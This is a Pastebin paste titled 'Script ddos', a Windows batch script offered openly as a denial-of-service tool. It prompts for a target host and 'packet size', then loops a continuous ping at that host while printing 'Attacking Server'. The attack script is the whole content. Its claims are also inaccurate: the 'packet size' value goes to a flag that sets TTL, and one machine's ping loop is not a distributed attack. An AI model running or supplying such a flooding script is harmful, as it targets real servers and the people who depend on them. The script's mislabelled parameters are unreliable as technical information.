Advertisement
wawan1

Script ddos

Mar 4th, 2017
8,583
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. @echo off
  2. mode 67,16
  3. title DDOS Attack
  4. color 0a
  5. cls
  6. echo.
  7. echo
  8. echo DDOS With Batchfile
  9. echo
  10. echo.
  11. set /p x=Server-Target:
  12. echo.
  13. echo
  14. ping %x%
  15. echo
  16. @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
  17. goto Next
  18. :Next
  19. echo.
  20. echo.
  21. echo.
  22. set /p m=ip Host:
  23. echo.
  24. set /p n=Packet Size:
  25. echo.
  26. :DDOS
  27. color 0c
  28. echo Attacking Server %m%
  29. ping %m% -i %n% -t >nul
  30. goto DDOS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement